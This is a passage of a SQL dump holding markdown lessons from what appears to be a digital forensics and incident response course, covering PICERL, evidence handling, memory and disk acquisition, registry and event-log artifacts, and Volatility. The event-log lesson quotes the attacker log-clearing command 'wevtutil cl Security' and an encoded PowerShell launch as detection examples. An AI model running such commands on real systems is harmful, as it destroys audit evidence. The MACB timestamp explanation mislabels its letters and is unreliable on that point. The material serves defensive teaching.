(1004, 791, '# The Incident Response Lifecycle (PICERL)\n\nIn the world of cybersecurity, it\'s not a matter of *if* an organization will be attacked, but *when*. When the inevitable happens, having a structured, repeatable process is the difference between a minor hiccup and a catastrophic data breach. \n\nThe industry standard for this process is defined by NIST (National Institute of Standards and Technology) and SANS. We\'ll be focusing on the widely adopted 6-step SANS PICERL methodology.\n\n## 1. Preparation\nThis is the most critical phase, and ironically, the one that happens *before* an incident occurs. You cannot respond to a fire if you don\'t have fire extinguishers, evacuation plans, and trained personnel.\n\n**Key Activities:**\n*   **Policy & Plan Creation:** Having an official Incident Response Plan (IRP).\n*   **Asset Management:** Knowing what servers, endpoints, and data you are defending.\n*   **Tooling:** Deploying EDR (Endpoint Detection & Response), SIEM, and ensuring logs are actually being collected and retained.\n*   **Team Readiness:** Conducting tabletop exercises (IR drills) and ensuring the SOC team has the right access privileges.\n\n## 2. Identification\nAlso known as Detection. This phase answers the question: \"Are we currently compromised?\"\n\n**Key Activities:**\n*   **Monitoring Alerts:** Reviewing SIEM alerts, IDS/IPS triggers, and EDR warnings.\n*   **Triaging:** Filtering out false positives. If a user tries to log in over VPN 5 times and fails because they forgot their password, it\'s an event. If they succeed on the 100th try from an IP in a high-risk country, it\'s an incident.\n*   **Declaring an Incident:** Officially escalating the event to a security incident so the IR plan can be enacted.\n\n## 3. Containment\nThe bleeding must be stopped. The goal here is to limit the scope and magnitude of the incident. 
Containment is often split into two phases:\n\n*   **Short-term Containment:** Immediate actions to stop the spread. E.g., isolating an infected laptop from the network, disabling a compromised VPN account, or pulling a server offline.\n*   **Long-term Containment:** Temporary fixes to allow operations to continue while rebuilding the system. E.g., routing traffic through a newly built, clean proxy server.\n\n## 4. Eradication\nOnce the threat is contained, it must be completely removed from the environment.\n\n**Key Activities:**\n*   **Removing Malicious Artifacts:** Deleting malware, reversing unauthorized registry changes, and removing persistence mechanisms (like cron jobs or scheduled tasks created by the attacker).\n*   **Patching the Root Cause:** If the attacker got in via an unpatched Apache Struts vulnerability, that server must be patched right now, otherwise they will just come back.\n\n## 5. Recovery\nBringing systems back into full production mode cautiously and verifying they are no longer compromised.\n\n**Key Activities:**\n*   **Restoring from Backups:** Rebuilding servers from clean, offline backups.\n*   **Credential Resets:** Forcing enterprise-wide password resets if Active Directory was compromised.\n*   **Monitoring Heightened:** Leaving increased monitoring on the affected systems for several weeks to ensure the attacker doesn\'t return.\n\n## 6. Lessons Learned\nOften skipped, but vital. This phase happens 1-2 weeks after the incident is closed.\n\n**Key Activities:**\n*   **Writing the Post-Mortem Report:** Documenting exactly what happened, chronological timeline, and the root cause.\n*   **Process Improvement:** Asking \"What did we do well?\" and \"What went wrong?\". 
If containment took 4 hours because the SOC didn\'t have access to the firewall console, the policy must be updated to give them access.\n\n---\n### Summary\nMemorize the acronym **PICERL**: Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned. As a DFIR analyst, your job spans all these phases, heavily focusing on Identification, Containment, and Eradication.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(1005, 792, '# Introduction to Digital Forensics\n\nIf Incident Response is the act of putting out the fire, Digital Forensics is the investigation into how the fire started, who started it, and what was burned.\n\n**Digital Forensics** is the application of scientific investigation applied to digital crimes and attacks. It involves the recovery, investigation, examination, and analysis of material found in digital devices.\n\n## The Goal of Forensics\nWhile Incident Responders just want to get the business back online as fast as possible, Forensic Investigators care about:\n1.  **Truth:** Establishing exactly what occurred.\n2.  **Attribution:** Finding out *who* did it (Internal threat? Nation state? Ransomware gang?).\n3.  **Impact Analysis:** Determining exactly what data was accessed, stolen, or destroyed.\n4.  **Legal Admissibility:** Ensuring the collected evidence holds up in a court of law.\n\n## Major Branches of Digital Forensics\n\n### 1. Computer/Disk Forensics\nThe classic discipline. This involves taking a physical or logical \"image\" (a bit-by-bit exact copy) of a hard drive or SSD.\n*   **What we look for:** Deleted files, browser history, illegal media, timeline of accessed documents, registry modifications.\n*   **Tools:** Autopsy, EnCase, FTK (Forensic Toolkit).\n\n### 2. Memory (RAM) Forensics\nHard drives are slow and persistent. Modern, sophisticated malware often runs entirely in Random Access Memory (RAM) to avoid leaving traces on the hard drive. \n*   **What we look for:** Decrypted passwords, active network connections, injected malicious code, running processes.\n*   **Tools:** Volatility, Rekall.\n\n### 3. Network Forensics\nAnalyzing network traffic to reconstruct events. 
It\'s often said that \"packets don\'t lie.\" Even if an attacker deletes the logs on a compromised server, the network traffic capturing their activity might still exist.\n*   **What we look for:** Data exfiltration (large uploads), Command and Control (C2) beacons, unencrypted credentials.\n*   **Tools:** Wireshark, Zeek, Suricata, Arkime.\n\n### 4. Mobile Forensics\nSmartphones are essentially highly personal computers. They are often critical in criminal investigations or corporate espionage cases.\n*   **What we look for:** SMS/WhatsApp messages, GPS locations, application usage, call logs.\n*   **Tools:** Cellebrite, Magnet AXIOM.\n\n## The Friction: Speed vs. Preservation\nThere is an inherent conflict between IT/Business Operations and Digital Forensics.\n\n*   **The Business:** \"The server is hacked! Nuke it, format the drive, and restore from backups so we can make money again!\"\n*   **Forensics Analyst:** \"Stop! Don\'t touch the server! Don\'t even power it off! If you reboot it, we lose the RAM! Let me take a 4-hour forensic image first over the network.\"\n\nA mature Incident Response plan balances these two conflicting needs, outlining exactly when a full forensic investigation is required vs. when rapid recovery is prioritized.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1006, 793, '# Chain of Custody & Evidence Handling\n\nIf you have a smoking gun with the suspect\'s fingerprints on it, but you leave it sitting in a public hallway for 3 hours before giving it to the police, the evidence is useless in court. The defense attorney will simply say: *\"Someone else must have touched it while it was in the hallway.\"*\n\nThe exact same concept applies to digital evidence.\n\n## What is the Chain of Custody?\nThe **Chain of Custody** is a chronological, written record detailing the seizure, custody, control, transfer, analysis, and disposition of physical or digital evidence. \n\nIt answers four critical questions at any given point in time:\n1.  **Who** collected the evidence?\n2.  **How** and **where** was it collected?\n3.  **Who** had possession of it subsequently?\n4.  **How** was it stored and protected in the meantime?\n\nIf the chain is broken (unaccounted time or an undocumented transfer), the evidence may be deemed inadmissible in legal proceedings.\n\n## Hashing for Integrity\nHow do you prove that the 500GB hard drive image you took last year is exactly the same today, and that you haven\'t maliciously altered any files on it to frame someone?\n\n**Hashing.**\n\nA cryptographic hash (like MD5, SHA-1, or SHA-256) is a one-way mathematical algorithm that assigns a unique, fixed-size string of characters to a piece of data. It acts as a digital fingerprint.\n\n### The Hashing Workflow:\n1.  **Acquisition:** You arrive on scene and create a forensic image (`image.dd`) of the suspect\'s laptop.\n2.  **Initial Hash:** Immediately, you run a SHA-256 hash on `image.dd`. The result is: `5e884...a13`.\n3.  **Documentation:** You write that hash value down on your official Chain of Custody form.\n4.  **Verification:** A year later in court, the defense demands proof that the image wasn\'t tampered with. You run the SHA-256 hash again on your copy. It outputs `5e884...a13`. The fingerprints match. 
\n\nIf even a *single byte* in that 500GB image was changed, the resulting hash would be completely different. Note that MD5 and SHA-1 are no longer collision-resistant, so record a SHA-256 hash (ideally alongside any legacy hash your tooling requires) for new acquisitions.\n\n## Write Blockers\nWhen acquiring evidence from a physical hard drive, you must avoid altering it. Simply booting up a Windows hard drive makes hundreds of registry changes and alters file access times instantly.\n\nTo prevent this, forensics analysts use hardware or software **Write Blockers**. \nA hardware write blocker sits between the suspect\'s hard drive and your forensic workstation. It allows your computer to *read* the data from the drive to make a copy, but physically intercepts and blocks any *write* commands, keeping the original evidence pristine.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1007, 794, '# Core Forensics Principles\n\nTo be a successful digital investigator, you must understand two fundamental principles that guide how and when we collect evidence.\n\n---\n\n## 1. Locard\'s Exchange Principle\nDr. Edmond Locard was an early pioneer in forensic science. His principle states:\n\n> *\"Every contact leaves a trace.\"*\n\nIn the physical world, if a burglar enters a house, they might leave behind DNA, shoe prints, or fabric fibers. Conversely, they take things away with them—carpet fibers on their shoes, or a victim\'s blood on their clothes.\n\n**In the Digital World:**\nWhen an attacker breaches a server, they *always* leave a trace, and they *always* alter the environment.\n*   **What they leave:** IP addresses in Apache logs, malicious binaries dropped in `/tmp`, newly created user accounts, or modified registry keys.\n*   **What they take:** Exfiltrated database files, stolen SSH keys.\n\nThe trace is always there. The job of the forensic analyst is simply to know where to look for it before it gets overwritten.\n\n---\n\n## 2. The Order of Volatility (RFC 3227)\nYou arrive at a compromised server. It\'s powered on. Do you unplug it immediately? Do you copy the log files first? Do you dump the RAM?\n\nEvidence must be collected based on its **Volatility** — how easily and quickly it can be lost or destroyed. You must gather the most volatile evidence first, moving down to the least volatile evidence.\n\n### The Standard Order of Volatility:\n*(From Most Volatile / First Collected → to Least Volatile / Last Collected)*\n\n1.  **Registers and Cache:** Data inside the CPU. (Extremely hard to capture, often ignored in standard IR).\n2.  **Routing Tables, ARP Cache, Process Table, Kernel Statistics:** This lives in RAM mapping active network/process states. It changes every millisecond.\n3.  **System Memory (RAM):** The contents of the running memory. If power is lost, this is gone forever.\n4.  
**Temporary File Systems:** E.g., the `/tmp` directory in Linux, which is often cleared upon a reboot.\n5.  **Disk (Hard Drive / SSD):** Persistent storage. Files, databases, and logs. This will survive a reboot.\n6.  **Remote Logging and Monitoring Data that is relevant to the system in question:** E.g., logs forwarded to a SIEM.\n7.  **Physical Configuration and Network Topology:** The physical layout of cables and routers.\n8.  **Archival Media:** Backups stored on tapes or in cold cloud storage.\n\n### The \"Pull the Plug\" Debate\nIn the old days, responders were trained to \"pull the power plug\" on a compromised machine immediately to stop the attacker. \n\n**Today, pulling the plug is considered bad practice in most situations.** \nWhy? Because modern malware, like advanced ransomware or fileless trojans, often lives *only* in RAM. If you pull the plug, you destroy the RAM, and you destroy the only evidence of the malware and its decryption keys. \n\nInstead, modern responders isolate the machine from the network (so the attacker loses access) and immediately image the RAM, securing the most volatile evidence first.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1008, 795, '# First Responder Operations\n\nWhen you are the first on the scene of a cyber incident, your actions in the first 15 minutes dictate the success or failure of the entire investigation. \n\nYou must act with the assumption that the incident will eventually end up in a legal battle, meaning every step must be defensible in court.\n\n## 1. Secure the Scene\nPhysical security comes before digital security. \n*   **Isolate the hardware:** Ensure no unauthorized personnel can walk up to the server rack or the suspect\'s laptop.\n*   **Document physical connections:** Take photographs of the computer, showing exactly what cables are plugged into what ports before you touch anything. If someone later claims a rogue USB was plugged in, you have photographic proof it wasn\'t.\n\n## 2. Triage the System State\nBefore pulling cables, you must determine what state the machine is in.\n*   **Is it powered off?** Do NOT turn it on. Booting a computer modifies thousands of files, altering timestamps and potentially triggering malware designed to destroy data upon boot.\n*   **Is it powered on?** Do NOT turn it off normally. Do NOT \"pull the plug\" right away. Leave it as is while you decide on your acquisition strategy (RAM first, then disk).\n*   **Is there a screen saver or lock screen?** Photograph what is visible. Do not attempt to guess the password, as modern systems (like BitLocker or Apple\'s secure enclave) will permanently wipe the encryption keys after too many failed attempts.\n\n## 3. Network Isolation\nYou need to stop the bleeding while preserving volatile data.\n*   **The old way:** \"Pull the network cable.\" \n*   **The modern way:** Use the switch, router, or EDR tool to logically isolate the machine. This allows you, the forensic analyst, to still remotely query the machine and pull RAM over the network, while preventing the machine from reaching the internet or the rest of the corporate network. 
\n*   **Warning:** If dealing with a mobile device, immediately put it in airplane mode or place it in a Faraday bag to prevent a remote wipe command from being received.\n\n## 4. The \"Live Response\" Toolkit\nIf you must interact with the live machine (e.g., to capture RAM), you cannot use the tools already installed on the machine (like the built-in Task Manager or `ps` command). Why? Because a rootkit might have replaced the built-in `ps` command to hide its own processes. \n\nInstead, first responders bring a \"Live Response Toolkit\" on a clean, trusted USB drive containing statically compiled, trusted forensic binaries.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1009, 796, '# Disk Acquisition & Write Blockers\n\nDisk acquisition is the process of creating an exact, bit-for-bit replica of a storage medium (Hard Drive, SSD, USB, SD Card). We never analyze the original evidence directly; we analyze the replica to preserve the original.\n\n## Logical vs. Physical Acquisition\nThere are two main types of acquisitions:\n\n### 1. Logical Acquisition\nA logical acquisition relies on the Operating System to read the files and copy them. It copies only the files the OS can see. \n*   **Pros:** Fast. Good for targeted collections (e.g., \"Just copy the user\'s Documents folder\").\n*   **Cons:** It misses deleted files, hidden partitions, and slack space. \n\n### 2. Physical (Bit-Stream) Acquisition\nA physical image reads the raw 1s and 0s directly from the physical disk hardware, ignoring the OS entirely. \n*   **Pros:** Captures absolutely everything, including deleted files, unallocated space, and hidden partitions. This is the gold standard for full investigations.\n*   **Cons:** Very slow. A 2TB drive requires a 2TB image file, even if the drive is 90% empty.\n\n## Write Blockers\nIf you plug a suspect\'s Windows hard drive into your forensic laptop just to \"take a look\", your Windows OS will aggressively mount the drive. In the background, it will update recycle bin files, change access timestamps, and create thumbnail caches. The evidence is now legally compromised.\n\nTo prevent this, we use **Write Blockers**. \nA write blocker is a device that intercepts all commands headed to the suspect drive. It allows `READ` commands to pass through but drops and blocks any `WRITE` commands.\n\n*   **Hardware Write Blockers:** Physical devices (like Tableau or WiebeTech) that you physically plug the suspect drive into. They are considered the most reliable method.\n*   **Software Write Blockers:** Software utilities or registry keys (like Linux mounting a drive as `read-only`). 
Less foolproof than hardware, but necessary for laptops where the SSD is soldered to the motherboard and cannot be physically removed.\n\n## Forensic Image Formats\nWhen you create the image, you don\'t just copy the files into a zip folder. You use specialized forensic formats:\n1.  **Raw (DD):** The simplest format. Just a massive file containing the exact 1s and 0s of the disk. No compression, no built-in metadata.\n2.  **EnCase (E01):** The industry standard. Combines the raw bitstream with compression, built-in hashing, and metadata (investigator name, case number) all wrapped into a single secure file.\n3.  **AFF4:** Advanced Forensic Format version 4. A newer, open-source format designed for high speed and massive datasets.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1010, 797, '# Memory (RAM) Acquisition\n\nMemory forensics has become the most critical component of modern Incident Response. As attackers adapt to disk forensics, they increasingly utilize \"fileless\" malware—malicious code that injects itself directly into the RAM of running processes and never touches the hard drive. \n\nIf you power off the machine before extracting the RAM, that evidence evaporates instantly.\n\n## Why RAM is the Holy Grail\nA full memory dump contains a snapshot of the exact state of the system at that moment in time. It holds:\n1.  **Running Processes:** Not just what the OS *thinks* is running, but what is *actually* executing in memory, including hidden rootkits.\n2.  **Active Network Connections:** You can see which processes are actively talking to external IP addresses (Command & Control beacons).\n3.  **Decrypted Data:** Even if the hard drive is encrypted with BitLocker, the system must hold the decryption key in RAM to function. Ram dumps routinely yield cleartext passwords, decryption keys, and private SSL keys.\n4.  **Clipboard Contents:** What the user just copied and pasted.\n5.  **Command History:** History of terminal commands recently run.\n\n## Acquisition Tools\nBecause RAM is actively being used by the operating system, you cannot use a simple copy command to grab it. You need a specialized kernel driver to access the raw memory space.\n\nCommon free tools include:\n*   **DumpIt (Windows):** A fast, simple executable. You run it from a USB drive, and it drops a `.raw` memory file onto your USB.\n*   **WinPmem (Windows/Linux/Mac):** Part of the Rekall project. Powerful, scriptable, and supports the generic `.raw` format as well as the more advanced `AFF4` format.\n*   **LiME (Linux):** Linux Memory Extractor. A Loadable Kernel Module (LKM) that creates a full memory capture of Linux devices.\n\n## The Smear Effect\nMemory is highly volatile and constantly changing. 
If a machine has 64GB of RAM, it might take 10 minutes to copy it all down to your USB drive. \n\nBy the time the tool finishes copying the 64th gigabyte, the data in the 1st gigabyte may already have changed since the copy started. \nThis results in a \"smear\"—the image is a patchwork of different moments in time, rather than a single frozen snapshot. Advanced memory analysis tools are designed to handle and compensate for this smear effect.\n\n## Hibernation Files and Pagefiles\nEven if a machine is powered off, you might still recover RAM data:\n*   **hiberfil.sys (Hibernation File):** When a Windows laptop is put into hibernation, the OS dumps the entire contents of RAM into this file on the hard drive to save power. Extracting this file provides a perfect, frozen memory dump from the exact moment the laptop went into hibernation.\n*   **pagefile.sys / swapfile.sys:** When RAM gets full, the OS temporarily moves idle data from RAM onto the hard drive to free up space. Analyzing these files can reveal historical artifacts that were once in memory.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1011, 798, '# Network Evidence Acquisition\n\nIn many incidents, the only trace of the attacker is the traffic they generated communicating with their Command and Control (C2) servers or exfiltrating data. It is often said that while logs can be deleted and files can be wiped, \"packets don\'t lie.\"\n\n## Full Packet Capture (PCAP)\nThe ultimate form of network evidence is a Full Packet Capture. This records every single bit of data traversing the wire—the headers, the routing information, and the actual payload (the contents of the emails, the files being downloaded, the web pages viewed).\n\n*   **Tools:** Wireshark, `tcpdump`.\n*   **The Problem:** Storing full PCAPs is incredibly expensive. A busy corporate firewall might process 10 Terabytes of data per day. Retaining full PCAPs for 30 days requires massive, specialized storage clusters (like Arkime/Moloch). Because of this, most organizations do not save full PCAPs.\n\n## NetFlow (Network Telemetry)\nIf you can\'t record the entire phone call (PCAP), the next best thing is to record the phone bill (NetFlow). \n\nNetFlow is metadata about network traffic. It records:\n*   Source IP & Destination IP\n*   Source Port & Destination Port\n*   Protocol (TCP/UDP)\n*   Total Bytes Transferred\n*   Start time & End time\n\nNetFlow does **not** record the payload. It cannot tell you *what* was inside the HTTP request, only that an HTTP request occurred and transferred 40MB of data.\n*   **Pros:** Requires 99% less storage than full PCAPs. 
You can store months of NetFlow data easily.\n*   **Usage in DFIR:** If an analyst sees a NetFlow record indicating 50 Gigabytes of data was sent from the internal Database Server to an unknown IP in Russia at 3:00 AM, they don\'t need the PCAP to know data exfiltration just occurred.\n\n## Log Files\nWhen PCAP and NetFlow are unavailable, analysts rely heavily on network appliance logs:\n*   **Firewall Logs:** Shows allowed and blocked connections.\n*   **Proxy Logs / Web Gateways:** Shows the exact URLs internal users visited, the user-agent strings, and HTTP status codes. This is critical for catching users clicking phishing links.\n*   **DNS Logs:** Attackers frequently use DNS to locate internal assets or even to exfiltrate data (DNS Tunneling). Analyzing DNS queries is a staple of network forensics.\n\n## Collecting Evidence on the Wire\nHow do we actually capture the traffic without interrupting the network?\n1.  **Port Mirroring (SPAN Port):** You configure the corporate network switch to take a copy of every packet passing through it and send that copy to a dedicated monitor port, where your forensic capture tool is plugged in.\n2.  **Network Taps:** A physical hardware device inserted directly inline with the network cable. It acts like a splitter, passively duplicating the optical or electrical signal to a capture device. Taps are completely invisible to the network and are more reliable than SPAN ports under heavy load.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1012, 799, '# The Windows Registry\n\nThe Windows Registry is the central hierarchical database used to store information necessary to configure the system for one or more users, applications, and hardware devices. For forensics analysts, it is an absolute goldmine.\n\nWhenever a user executes a program, plugs in a USB drive, or changes a setting, a trace is left in the Registry.\n\n## Structure of the Registry\nThe registry is divided into five main logical root keys (Hives):\n1.  **HKEY_LOCAL_MACHINE (HKLM):** Settings applied to the entire machine, regardless of who is logged in.\n2.  **HKEY_CURRENT_USER (HKCU):** Settings unique to the currently logged-in user.\n3.  **HKEY_USERS (HKU):** Contains all the loaded user profiles. (HKCU is actually just a pointer into a specific subkey inside HKU).\n4.  **HKEY_CLASSES_ROOT (HKCR):** File extension associations (e.g., telling Windows that `.txt` opens with Notepad).\n5.  **HKEY_CURRENT_CONFIG (HKCC):** Information about the hardware profile currently being used.\n\n## Where are the files?\nWhen you image a hard drive, you don\'t get a file called `registry.exe`. The registry is actually made up of several physical files called **Hives** located on the disk:\n*   `C:\\Windows\\System32\\config\\SYSTEM` (Maps to HKLM\\SYSTEM)\n*   `C:\\Windows\\System32\\config\\SOFTWARE` (Maps to HKLM\\SOFTWARE)\n*   `C:\\Windows\\System32\\config\\SECURITY` (Maps to HKLM\\SECURITY)\n*   `C:\\Windows\\System32\\config\\SAM` (Security Account Manager - Holds local password hashes)\n*   `C:\\Users\\<username>\\NTUSER.DAT` (Maps to the specific user\'s HKCU)\n\n## Key Forensic Artifacts in the Registry\n\n### 1. Persistence (Auto-Start Extensibility Points)\nAttackers want their malware to survive a reboot. 
The easiest way to do this is to add a registry key telling Windows to run the malware every time it starts.\n*   **Run Keys:** `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` and `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\n*   *Forensic Value:* Always check these keys. If you see `C:\\Users\\Public\\svchost.exe` launching from a Run key, the machine is compromised.\n\n### 2. USB Device History (USBStor)\nDid the suspected employee copy the secret blueprints to a thumb drive? \n*   **Location:** `HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR`\n*   *Forensic Value:* Records the Vendor, Product ID, and unique Serial Number of *every* USB mass storage device that has ever been plugged into the machine.\n\n### 3. UserAssist\n*   **Location:** `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist`\n*   *Forensic Value:* Tracks which GUI applications the user executed, how many times they ran them, and the last time they were executed. The names of the programs are lightly obfuscated using ROT-13 encoding (a simple letter substitution, not encryption), which your forensic tools will decode automatically.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1013, 800, '# Windows Event Logs\n\nWindows Event Logs (`.evtx` files) are the primary source of chronological historical data on a Windows system. They track logins, service starts, application crashes, and security policy changes.\n\nThey are stored in `C:\\Windows\\System32\\winevt\\Logs\\`.\n\n## The Big Three\nWhile modern Windows has hundreds of event log files, the core three are:\n1.  **System:** Events logged by Windows system components (e.g., a driver failing to load, or the system booting up).\n2.  **Application:** Events logged by installed software (e.g., Microsoft Word crashing, or an antivirus detecting a file).\n3.  **Security:** Events related to authentication, privilege use, and object access. *By default, only Administrators can view this log.*\n\n## Crucial Security Event IDs (EIDs)\nAs a DFIR analyst, you must memorize these specific Event IDs. They are the bread and butter of finding attackers.\n\n### Logon & Authentication\n*   **EID 4624:** Successful Logon. \n    *   *Forensic Value:* Shows *who* logged in, *when*, and from *where* (Source IP). The \"Logon Type\" field is critical. Type 2 means Interactive (Physical keyboard). Type 3 means Network (e.g., accessing a shared folder). Type 10 means Remote Interactive (RDP).\n*   **EID 4625:** Failed Logon.\n    *   *Forensic Value:* A high volume of 4625s in a short time frame indicates a Brute Force or Password Spraying attack.\n*   **EID 4672:** Special Privileges Assigned to New Logon.\n    *   *Forensic Value:* This means the user logged in as an Administrator (or used \"Run as Administrator\").\n\n### Account Management\n*   **EID 4720:** A user account was created.\n    *   *Forensic Value:* Attackers often create backup \"backdoor\" accounts (like `SysAdmin1`) just in case their malware is discovered and removed. 
\n*   **EID 4722 / 4724:** Account enabled / Password reset.\n*   **EID 4732:** A member was added to a security-enabled local group.\n    *   *Forensic Value:* Look closely if the target group is \"Administrators\". This is a sign of local privilege escalation.\n\n### Process Execution\nBy default, Windows does not log every program that runs. However, if Advanced Audit Policy is enabled, you get:\n*   **EID 4688:** A new process has been created.\n    *   *Forensic Value:* Tells you exactly what time a program ran. If command-line auditing is turned on, it will even log the exact arguments (e.g., `powershell.exe -NoProfile -EncodedCommand JABX...`), which is incredibly useful for catching malicious scripts.\n\n## Clearing Logs\n*   **EID 1102:** The audit log was cleared.\n    *   *Forensic Value:* The massive red flag. Attackers often run the command `wevtutil cl Security` to erase their tracks. If you see EID 1102, assume an attacker was present, had Administrator rights, and intentionally deleted evidence.', 'markdown', 8, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1014, 801, '# Evidence of Execution\n\nOne of the most common questions an analyst must answer is: *\"Did the malware actually run?\"* \n\nJust because a malicious file exists on the hard drive does not mean the user actually double-clicked it. To prove execution, we look at several specific Windows artifacts.\n\n## 1. Prefetch (*.pf files)\nWindows uses Prefetch to speed up the boot process and application launch times. When an application runs for the first time, Windows analyzes what files and DLLs it needs and creates a `.pf` file in `C:\\Windows\\Prefetch\\`. \n\nThe next time the application runs, Windows reads the `.pf` file and pre-loads the necessary components into memory, making the application launch faster.\n\n*   **Forensic Value:** \n    *   **Proof of execution:** If `nc.exe-0D12ABCD.pf` exists, Netcat was absolutely executed on this machine.\n    *   **Execution count:** The file stores exactly how many times the application has been run.\n    *   **Timestamps:** It stores the timestamp of the last execution, as well as up to 7 previous execution timestamps (in Windows 8+).\n    *   **Target path:** It shows exactly where the executable was located when it ran (e.g., was it run from `C:\\Temp` or from a USB drive?).\n\n## 2. Shimcache (Application Compatibility Cache)\nWhenever an application runs, Windows checks if it needs any special compatibility settings (shims) to run properly (e.g., \"Does this program think it\'s running on Windows XP?\").\n\nWindows caches these checks in the Registry at `HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache`.\n\n*   **Forensic Value:** \n    *   The Shimcache tracks the file path, the file size, and the Last Modified time of the executable.\n    *   It is fantastic for tracking executables that were run from a USB drive and subsequently deleted. 
Even if the USB is removed, the trace remains in the Shimcache.\n    *   *Note:* The Shimcache does not definitively prove execution (a file can enter the cache just by being browsed in Explorer), but it proves the file existed on the system at a specific path.\n\n## 3. Amcache\nA newer artifact (Windows 8+) located at `C:\\Windows\\AppCompat\\Programs\\Amcache.hve`. It is technically its own registry hive file.\n\n*   **Forensic Value:**\n    *   Similar to Shimcache but records much more detail, notably the **SHA-1 hash** of the executable. \n    *   This is incredibly powerful. Even if an attacker renames their malware from `mimikatz.exe` to `svchost.exe`, the Amcache will record its true SHA-1 hash, allowing analysts to instantly identify the malicious binary.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1015, 802, '# File System Artifacts\n\nBeyond the registry and logs, the NTFS file system itself leaves dozens of clues about user behavior and file manipulation.\n\n## Master File Table (MFT)\nNTFS uses a database called the Master File Table (MFT) to track every single file and folder on the volume. The file itself is called `$MFT`. \n\n*   **MACB Timestamps:** The MFT records four critical timestamps for every file:\n    *   **M**odified: When the file contents were last changed.\n    *   **A**ccessed: When the file was last opened/read.\n    *   **C**reated: When the file was first created on this volume.\n    *   **MFT Modified (B for birthed/metadata):** When the file\'s metadata (permissions, name) was last changed.\n*   **Time Stomping:** Advanced attackers use anti-forensic tools to alter MAC timestamps to make malicious files blend in (e.g., changing malware creation date to 2018). However, it is very difficult to successfully forge the \'MFT Modified\' timestamp, meaning forensic tools can often detect time stomping.\n\n## Windows Shortcut Files (.lnk)\nWhen a user opens a file, Windows often automatically creates a shortcut (`.lnk`) file pointing to it (e.g., in the \"Recent Items\" folder). \n\n*   **Forensic Value:** LNK files are gold. They contain metadata about the target file *and* the system it was on. Even if the target file was on a USB drive that is now gone, the LNK file left behind tells us:\n    1.  The original path of the file.\n    2.  The MAC timestamps of the target file.\n    3.  The Volume Serial Number of the USB drive it was on.\n    4.  The MAC address of the machine where the file was originally created.\n\n## The Recycle Bin\nWhen a user \"deletes\" a file, Windows doesn\'t actually erase the 1s and 0s. Firstly, it just moves the file to a hidden system folder called `$Recycle.Bin`. \n\nInside the Recycle Bin, Windows splits the deleted file into two pieces:\n1.  
**$R file:** The actual contents of the deleted file, renamed with a random string ($R123456.docx).\n2.  **$I file:** A metadata file containing the *original name* of the file, its *original path* before it was deleted, and the exact *timestamp* it was deleted.\n\nIf you find a suspicious file in the Recycle Bin, parsing its corresponding `$I` file tells you exactly where it came from and when the suspect tried to get rid of it.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1016, 803, '# Introduction to Volatility\n\nVolatility is the world\'s most widely used, open-source memory forensics framework. Written in Python, it allows investigators to analyze RAM captures (.raw, .vmem, .dmp) offline to reconstruct the exact state of a computer at the moment the memory was captured.\n\n## Volatility 2 vs Volatility 3\nThere are two main versions of Volatility currently in use:\n*   **Volatility 2:** The traditional version (Python 2). It requires the analyst to manually specify a **\"Profile\"** (the exact OS version, e.g., `Win7SP1x64`) before it can parse the memory image. If you guess the wrong profile, Volatility returns gibberish.\n*   **Volatility 3:** The modern version (Python 3). It largely eliminates the need for manual profiles. Instead, it downloads \"Symbol Tables\" from Microsoft on the fly to automatically figure out the OS version and parse the structures.\n\nEverything in this module focuses on Volatility 3, as it is the current industry standard.\n\n## Basic Syntax (Volatility 3)\nThe syntax for Volatility 3 is straight-forward: you run the `vol.py` script, provide the target memory image using `-f`, and then specify a **plugin**.\n\nA plugin is a specific script that looks for a specific artifact in memory.\n\n**Syntax:** \n`python3 vol.py -f <memory_image> <plugin_name>`\n\n**Example:**\n`python3 vol.py -f infected_laptop.raw windows.info`\n\n## The \'windows.info\' Plugin\nThe absolute first plugin you should run on any new memory image is `windows.info`.\n\n*   **What it does:** It analyzes the basic header structures of the memory image to determine the exact Operating System version, the primary architecture (32-bit vs 64-bit), the exact build number, and the time the memory image was created.\n*   **Forensic Value:** It proves the memory image is sound and readable, and gives you the exact timestamp of the acquisition, which is perfectly aligned toUTC time (unlike disk timestamps which might be affected by local 
timezones).', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
